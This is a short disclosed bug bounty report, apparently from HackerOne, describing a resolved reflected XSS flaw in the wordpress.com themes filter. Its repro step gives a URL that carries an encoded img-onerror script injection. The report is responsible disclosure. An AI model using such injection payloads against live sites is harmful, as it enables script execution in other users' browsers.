XSS at wordpress.com

Disclosed: 2016-02-18 04:45:29 By valievkarim To automattic

Unknown

Vulnerability Details

1) Using Firefox, visit the link: https://wordpress.com/themes/filter/blog/type/%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E 2) alert is shown. Screenshot is attached

Actions

View on HackerOne

Report Stats

Report ID: 111500
State: Closed
Substate: resolved
Upvotes: 1

XSS at wordpress.com

Vulnerability Details

Actions

Report Stats

Share this report